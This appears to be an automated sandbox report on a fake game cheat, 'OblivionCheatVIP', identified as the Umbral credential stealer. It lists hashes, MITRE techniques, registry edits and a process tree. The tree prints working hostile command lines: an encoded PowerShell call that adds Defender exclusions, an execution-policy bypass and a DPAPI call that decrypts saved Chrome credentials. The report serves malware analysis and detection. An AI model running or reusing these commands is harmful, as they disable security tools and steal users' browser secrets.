umbral | f139ed18bca38e4e61fa88f94f0a070d217df1c1f647191510253352724ea1b5

Analysis

max time kernel
148s
max time network
155s
platform
windows11-21h2_x64
resource
win11-20241007-fr
resource tags

arch:x64arch:x86image:win11-20241007-frlocale:fr-fros:windows11-21h2-x64systemwindows
submitted
14-01-2025 20:43

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

OblivionCheatVIP 2.1/OblivionClient.exe
Size

41.8MB
MD5

95a3e8c1d4a5c7bd87a123b5cccb9f67
SHA1

152bca2603e39111cc446692d8a29501d980def9
SHA256

aa3765a7cfa4a5430c350c0d44252216c215c3fb3ffdf793cbef71dea633bdd8
SHA512

8c9663f0f7700dd71475e9bad481e38a1131c636181ca768c4b9016c5e6e233131a37ab5e100b6c071459ef4ee6a7ace6eb22bd671cf5b0c8ded61e6ac8387d1
SSDEEP

786432:/ogRer1/vUMrlxwEnk9T5diXo80MVzyj41wt/B3FVB4idWQb9QqMbJVaGeSWj:/ogRA1/3l1nkZ5diXo80MVu82TrXQqk4

Score

10^/10

umbral defense_evasion discovery evasion execution persistence spyware stealer trojan

Malware Config

Signatures

Detect Umbral payload 2 IoCs

resource	yara_rule
behavioral32/files/0x001900000002ad7e-43.dat	family_umbral
behavioral32/memory/2896-50-0x0000015BC9C00000-0x0000015BC9C40000-memory.dmp	family_umbral

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Umbral family
umbral

Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1008	powershell.exe
2004	powershell.exe
1596	powershell.exe
2316	powershell.exe
4976	powershell.exe
4716	powershell.exe
2244	powershell.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	svchost.exe

Executes dropped EXE 5 IoCs

pid	Process
4608	TestingServer.exe
4116	Node.exe
2896	svchost.exe
4656	python-installer.exe
3892	python-installer.exe

Loads dropped DLL 2 IoCs

pid	Process
4116	Node.exe
3892	python-installer.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000\Software\Microsoft\Windows\CurrentVersion\Run\Node = "C:\\ProgramData\\Update.vbs"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4} = "\"C:\\Users\\Admin\\AppData\\Local\\Package Cache\\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4}\\python-3.12.6-amd64.exe\" /burn.runonce"	python-installer.exe

Blocklisted process makes network request 2 IoCs

flow	pid	Process
12	3820	msiexec.exe
14	3820	msiexec.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Enumerates connected drives 3 TTPs 23 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
2	discord.com
6	discord.com
9	discord.com
11	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
4	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs

pid	Process
3548	cmd.exe
3276	cmd.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	C:\Windows\System32\uC62BSYBZQ.txt	Node.exe
File opened for modification	C:\Windows\System32\uC62BSYBZQ.txt	Node.exe

Enumerates processes with tasklist 1 TTPs 2 IoCs

discovery

Process Discovery

T1057

pid	Process
3164	tasklist.exe
1292	tasklist.exe

Drops file in Windows directory 30 IoCs

description	ioc	Process
File created	C:\Windows\Installer\e580652.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIC02.tmp	msiexec.exe
File created	C:\Windows\SystemTemp\~DF59CEA7B2353B5372.TMP	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File created	C:\Windows\SystemTemp\~DF587AE12B66C49360.TMP	msiexec.exe
File created	C:\Windows\SystemTemp\~DFB4A19830A49A71EA.TMP	msiexec.exe
File created	C:\Windows\SystemTemp\~DFC7AFC30253EE753C.TMP	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIEA3.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI9DE.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\e580649.msi	msiexec.exe
File created	C:\Windows\SystemTemp\~DF7FF91DE9CBD656C0.TMP	msiexec.exe
File created	C:\Windows\Installer\e580644.msi	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File created	C:\Windows\SystemTemp\~DF76332A94D5CB98C7.TMP	msiexec.exe
File created	C:\Windows\Installer\e58064e.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\e58064e.msi	msiexec.exe
File created	C:\Windows\Installer\SourceHash{2F4E9933-7587-4D85-9BA1-F2903AFB36D8}	msiexec.exe
File created	C:\Windows\Installer\SourceHash{901B913C-FA63-48D2-9842-7D7676739378}	msiexec.exe
File created	C:\Windows\SystemTemp\~DF0349D75F6C515EE3.TMP	msiexec.exe
File opened for modification	C:\Windows\Installer\e580644.msi	msiexec.exe
File created	C:\Windows\SystemTemp\~DF80585C69BBCDAC00.TMP	msiexec.exe
File created	C:\Windows\Installer\e58064d.msi	msiexec.exe
File created	C:\Windows\SystemTemp\~DF49283A51A6AF5DBD.TMP	msiexec.exe
File created	C:\Windows\Installer\e580648.msi	msiexec.exe
File created	C:\Windows\SystemTemp\~DFDBEF4910309342A6.TMP	msiexec.exe
File created	C:\Windows\Installer\e580649.msi	msiexec.exe
File created	C:\Windows\Installer\SourceHash{537B2AF5-504B-4303-99CB-FDE56F47AA51}	msiexec.exe
File created	C:\Windows\SystemTemp\~DF018666E7E7C3E82E.TMP	msiexec.exe
File created	C:\Windows\SystemTemp\~DF390DE6D09F9255B5.TMP	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	python-installer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	OblivionClient.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	python-installer.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
3328	cmd.exe
652	PING.EXE

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
4208	wmic.exe

Modifies registry class 24 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Installer\Dependencies\{901B913C-FA63-48D2-9842-7D7676739378}\ = "{901B913C-FA63-48D2-9842-7D7676739378}"	python-installer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Installer\Dependencies\{537B2AF5-504B-4303-99CB-FDE56F47AA51}\Version = "3.12.6150.0"	python-installer.exe
Key created	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Installer\Dependencies\{537B2AF5-504B-4303-99CB-FDE56F47AA51}\Dependents	python-installer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Installer\Dependencies\{2F4E9933-7587-4D85-9BA1-F2903AFB36D8}\ = "{2F4E9933-7587-4D85-9BA1-F2903AFB36D8}"	python-installer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Installer\Dependencies\{2F4E9933-7587-4D85-9BA1-F2903AFB36D8}\DisplayName = "Python 3.12.6 Development Libraries (64-bit)"	python-installer.exe
Key created	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Installer\Dependencies\{901B913C-FA63-48D2-9842-7D7676739378}	python-installer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Installer\Dependencies\{901B913C-FA63-48D2-9842-7D7676739378}\Version = "3.12.6150.0"	python-installer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Installer\Dependencies\CPython-3.12\ = "{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4}"	python-installer.exe
Key created	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Installer\Dependencies\CPython-3.12\Dependents\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4}	python-installer.exe
Key created	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Installer\Dependencies\{901B913C-FA63-48D2-9842-7D7676739378}\Dependents\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4}	python-installer.exe
Key created	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Installer\Dependencies\{901B913C-FA63-48D2-9842-7D7676739378}\Dependents	python-installer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Installer\Dependencies\{537B2AF5-504B-4303-99CB-FDE56F47AA51}\ = "{537B2AF5-504B-4303-99CB-FDE56F47AA51}"	python-installer.exe
Key created	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Installer\Dependencies\{2F4E9933-7587-4D85-9BA1-F2903AFB36D8}	python-installer.exe
Key created	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Installer	python-installer.exe
Key created	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Installer\Dependencies	python-installer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Installer\Dependencies\{2F4E9933-7587-4D85-9BA1-F2903AFB36D8}\Version = "3.12.6150.0"	python-installer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Installer\Dependencies\CPython-3.12\DisplayName = "Python 3.12.6 (64-bit)"	python-installer.exe
Key created	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Installer\Dependencies\CPython-3.12\Dependents	python-installer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Installer\Dependencies\{901B913C-FA63-48D2-9842-7D7676739378}\DisplayName = "Python 3.12.6 Core Interpreter (64-bit)"	python-installer.exe
Key created	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Installer\Dependencies\{537B2AF5-504B-4303-99CB-FDE56F47AA51}	python-installer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Installer\Dependencies\{537B2AF5-504B-4303-99CB-FDE56F47AA51}\DisplayName = "Python 3.12.6 Executables (64-bit)"	python-installer.exe
Key created	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Installer\Dependencies\{537B2AF5-504B-4303-99CB-FDE56F47AA51}\Dependents\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4}	python-installer.exe
Key created	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Installer\Dependencies\CPython-3.12	python-installer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Installer\Dependencies\CPython-3.12\Version = "3.12.6150.0"	python-installer.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
652	PING.EXE

Suspicious behavior: EnumeratesProcesses 29 IoCs

pid	Process
104	powershell.exe
104	powershell.exe
1008	powershell.exe
1008	powershell.exe
404	powershell.exe
404	powershell.exe
3188	powershell.exe
3188	powershell.exe
2004	powershell.exe
2004	powershell.exe
1596	powershell.exe
1596	powershell.exe
2896	svchost.exe
2316	powershell.exe
2316	powershell.exe
4976	powershell.exe
4976	powershell.exe
4716	powershell.exe
4716	powershell.exe
4620	powershell.exe
4620	powershell.exe
2244	powershell.exe
2244	powershell.exe
3820	msiexec.exe
3820	msiexec.exe
3820	msiexec.exe
3820	msiexec.exe
3820	msiexec.exe
3820	msiexec.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	104	powershell.exe
Token: SeDebugPrivilege	2896	svchost.exe
Token: SeDebugPrivilege	1008	powershell.exe
Token: SeIncreaseQuotaPrivilege	3676	WMIC.exe
Token: SeSecurityPrivilege	3676	WMIC.exe
Token: SeTakeOwnershipPrivilege	3676	WMIC.exe
Token: SeLoadDriverPrivilege	3676	WMIC.exe
Token: SeSystemProfilePrivilege	3676	WMIC.exe
Token: SeSystemtimePrivilege	3676	WMIC.exe
Token: SeProfSingleProcessPrivilege	3676	WMIC.exe
Token: SeIncBasePriorityPrivilege	3676	WMIC.exe
Token: SeCreatePagefilePrivilege	3676	WMIC.exe
Token: SeBackupPrivilege	3676	WMIC.exe
Token: SeRestorePrivilege	3676	WMIC.exe
Token: SeShutdownPrivilege	3676	WMIC.exe
Token: SeDebugPrivilege	3676	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3676	WMIC.exe
Token: SeRemoteShutdownPrivilege	3676	WMIC.exe
Token: SeUndockPrivilege	3676	WMIC.exe
Token: SeManageVolumePrivilege	3676	WMIC.exe
Token: 33	3676	WMIC.exe
Token: 34	3676	WMIC.exe
Token: 35	3676	WMIC.exe
Token: 36	3676	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3676	WMIC.exe
Token: SeSecurityPrivilege	3676	WMIC.exe
Token: SeTakeOwnershipPrivilege	3676	WMIC.exe
Token: SeLoadDriverPrivilege	3676	WMIC.exe
Token: SeSystemProfilePrivilege	3676	WMIC.exe
Token: SeSystemtimePrivilege	3676	WMIC.exe
Token: SeProfSingleProcessPrivilege	3676	WMIC.exe
Token: SeIncBasePriorityPrivilege	3676	WMIC.exe
Token: SeCreatePagefilePrivilege	3676	WMIC.exe
Token: SeBackupPrivilege	3676	WMIC.exe
Token: SeRestorePrivilege	3676	WMIC.exe
Token: SeShutdownPrivilege	3676	WMIC.exe
Token: SeDebugPrivilege	3676	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3676	WMIC.exe
Token: SeRemoteShutdownPrivilege	3676	WMIC.exe
Token: SeUndockPrivilege	3676	WMIC.exe
Token: SeManageVolumePrivilege	3676	WMIC.exe
Token: 33	3676	WMIC.exe
Token: 34	3676	WMIC.exe
Token: 35	3676	WMIC.exe
Token: 36	3676	WMIC.exe
Token: SeDebugPrivilege	3164	tasklist.exe
Token: SeDebugPrivilege	1292	tasklist.exe
Token: SeDebugPrivilege	404	powershell.exe
Token: SeDebugPrivilege	3188	powershell.exe
Token: SeIncreaseQuotaPrivilege	2860	wmic.exe
Token: SeSecurityPrivilege	2860	wmic.exe
Token: SeTakeOwnershipPrivilege	2860	wmic.exe
Token: SeLoadDriverPrivilege	2860	wmic.exe
Token: SeSystemProfilePrivilege	2860	wmic.exe
Token: SeSystemtimePrivilege	2860	wmic.exe
Token: SeProfSingleProcessPrivilege	2860	wmic.exe
Token: SeIncBasePriorityPrivilege	2860	wmic.exe
Token: SeCreatePagefilePrivilege	2860	wmic.exe
Token: SeBackupPrivilege	2860	wmic.exe
Token: SeRestorePrivilege	2860	wmic.exe
Token: SeShutdownPrivilege	2860	wmic.exe
Token: SeDebugPrivilege	2860	wmic.exe
Token: SeSystemEnvironmentPrivilege	2860	wmic.exe
Token: SeRemoteShutdownPrivilege	2860	wmic.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3304 wrote to memory of 104	3304	OblivionClient.exe	77
PID 3304 wrote to memory of 104	3304	OblivionClient.exe	77
PID 3304 wrote to memory of 104	3304	OblivionClient.exe	77
PID 3304 wrote to memory of 4608	3304	OblivionClient.exe	79
PID 3304 wrote to memory of 4608	3304	OblivionClient.exe	79
PID 3304 wrote to memory of 4116	3304	OblivionClient.exe	80
PID 3304 wrote to memory of 4116	3304	OblivionClient.exe	80
PID 3304 wrote to memory of 2896	3304	OblivionClient.exe	82
PID 3304 wrote to memory of 2896	3304	OblivionClient.exe	82
PID 4116 wrote to memory of 3812	4116	Node.exe	83
PID 4116 wrote to memory of 3812	4116	Node.exe	83
PID 3812 wrote to memory of 1008	3812	cmd.exe	84
PID 3812 wrote to memory of 1008	3812	cmd.exe	84
PID 1008 wrote to memory of 1224	1008	powershell.exe	85
PID 1008 wrote to memory of 1224	1008	powershell.exe	85
PID 1224 wrote to memory of 3804	1224	csc.exe	86
PID 1224 wrote to memory of 3804	1224	csc.exe	86
PID 4116 wrote to memory of 3256	4116	Node.exe	87
PID 4116 wrote to memory of 3256	4116	Node.exe	87
PID 3256 wrote to memory of 3676	3256	cmd.exe	88
PID 3256 wrote to memory of 3676	3256	cmd.exe	88
PID 4116 wrote to memory of 2976	4116	Node.exe	89
PID 4116 wrote to memory of 2976	4116	Node.exe	89
PID 2976 wrote to memory of 3164	2976	cmd.exe	90
PID 2976 wrote to memory of 3164	2976	cmd.exe	90
PID 4116 wrote to memory of 4004	4116	Node.exe	92
PID 4116 wrote to memory of 4004	4116	Node.exe	92
PID 4116 wrote to memory of 3548	4116	Node.exe	93
PID 4116 wrote to memory of 3548	4116	Node.exe	93
PID 4004 wrote to memory of 1292	4004	cmd.exe	94
PID 4004 wrote to memory of 1292	4004	cmd.exe	94
PID 3548 wrote to memory of 404	3548	cmd.exe	95
PID 3548 wrote to memory of 404	3548	cmd.exe	95
PID 4116 wrote to memory of 3276	4116	Node.exe	96
PID 4116 wrote to memory of 3276	4116	Node.exe	96
PID 3276 wrote to memory of 3188	3276	cmd.exe	97
PID 3276 wrote to memory of 3188	3276	cmd.exe	97
PID 2896 wrote to memory of 2860	2896	svchost.exe	98
PID 2896 wrote to memory of 2860	2896	svchost.exe	98
PID 4116 wrote to memory of 4624	4116	Node.exe	137
PID 4116 wrote to memory of 4624	4116	Node.exe	137
PID 4624 wrote to memory of 4688	4624	cmd.exe	101
PID 4624 wrote to memory of 4688	4624	cmd.exe	101
PID 4116 wrote to memory of 132	4116	Node.exe	102
PID 4116 wrote to memory of 132	4116	Node.exe	102
PID 4116 wrote to memory of 5112	4116	Node.exe	103
PID 4116 wrote to memory of 5112	4116	Node.exe	103
PID 4116 wrote to memory of 4964	4116	Node.exe	104
PID 4116 wrote to memory of 4964	4116	Node.exe	104
PID 5112 wrote to memory of 3076	5112	cmd.exe	105
PID 5112 wrote to memory of 3076	5112	cmd.exe	105
PID 132 wrote to memory of 1708	132	cmd.exe	106
PID 132 wrote to memory of 1708	132	cmd.exe	106
PID 4964 wrote to memory of 2004	4964	cmd.exe	107
PID 4964 wrote to memory of 2004	4964	cmd.exe	107
PID 4116 wrote to memory of 3304	4116	Node.exe	108
PID 4116 wrote to memory of 3304	4116	Node.exe	108
PID 3304 wrote to memory of 1596	3304	cmd.exe	109
PID 3304 wrote to memory of 1596	3304	cmd.exe	109
PID 4116 wrote to memory of 3776	4116	Node.exe	110
PID 4116 wrote to memory of 3776	4116	Node.exe	110
PID 4116 wrote to memory of 4376	4116	Node.exe	111
PID 4116 wrote to memory of 4376	4116	Node.exe	111
PID 4116 wrote to memory of 3328	4116	Node.exe	112

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4740	attrib.exe

C:\Users\Admin\AppData\Local\Temp\OblivionCheatVIP 2.1\OblivionClient.exe
"C:\Users\Admin\AppData\Local\Temp\OblivionCheatVIP 2.1\OblivionClient.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3304
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAYQBnACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGMAZgBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHkAYgB3ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAYgBhACMAPgA="
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:104
- C:\Users\Admin\AppData\Local\Temp\TestingServer.exe
  "C:\Users\Admin\AppData\Local\Temp\TestingServer.exe"
  2⤵
  - Executes dropped EXE
  PID:4608
- C:\Users\Admin\AppData\Local\Temp\Node.exe
  "C:\Users\Admin\AppData\Local\Temp\Node.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Drops file in System32 directory
  - Suspicious use of WriteProcessMemory
  PID:4116
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\ElGVZ8tBmU.ps1""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3812
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\ElGVZ8tBmU.ps1"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1008
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\c1nywozl\c1nywozl.cmdline"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1224
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9D49.tmp" "c:\Users\Admin\AppData\Local\Temp\c1nywozl\CSC6F859CF7EF78497BBD1BAFBFAC80D0C8.TMP"
        6⤵
        
        PID:3804
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3256
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic diskdrive get serialnumber
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3676
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2976
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:3164
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4004
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:1292
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,205,112,88,179,132,152,53,70,180,71,255,78,165,25,123,170,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,43,89,79,5,126,250,1,116,121,112,125,247,184,252,128,220,23,15,53,29,220,16,58,248,72,180,170,131,158,104,44,57,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,57,59,203,225,204,119,242,139,210,68,71,146,2,37,136,134,66,144,112,142,66,58,26,68,134,43,21,84,18,239,144,238,48,0,0,0,179,190,213,250,218,10,50,178,57,11,222,156,60,184,210,63,9,30,72,48,30,210,20,10,229,49,211,45,138,115,187,229,229,148,27,65,245,58,200,51,235,179,65,68,192,41,9,135,64,0,0,0,144,69,82,125,59,185,250,183,128,99,111,153,174,13,23,110,184,101,70,128,152,69,237,30,128,93,81,177,7,102,235,13,25,49,14,117,198,198,136,8,143,246,210,139,19,28,201,126,21,33,138,24,127,198,49,49,224,12,96,7,150,204,43,64), $null, 'CurrentUser')"
    3⤵
    - An obfuscated cmd.exe command-line is typically used to evade detection.
    - Suspicious use of WriteProcessMemory
    PID:3548
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,205,112,88,179,132,152,53,70,180,71,255,78,165,25,123,170,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,43,89,79,5,126,250,1,116,121,112,125,247,184,252,128,220,23,15,53,29,220,16,58,248,72,180,170,131,158,104,44,57,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,57,59,203,225,204,119,242,139,210,68,71,146,2,37,136,134,66,144,112,142,66,58,26,68,134,43,21,84,18,239,144,238,48,0,0,0,179,190,213,250,218,10,50,178,57,11,222,156,60,184,210,63,9,30,72,48,30,210,20,10,229,49,211,45,138,115,187,229,229,148,27,65,245,58,200,51,235,179,65,68,192,41,9,135,64,0,0,0,144,69,82,125,59,185,250,183,128,99,111,153,174,13,23,110,184,101,70,128,152,69,237,30,128,93,81,177,7,102,235,13,25,49,14,117,198,198,136,8,143,246,210,139,19,28,201,126,21,33,138,24,127,198,49,49,224,12,96,7,150,204,43,64), $null, 'CurrentUser')
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:404
- - C:\Windows\system32\cmd.exe
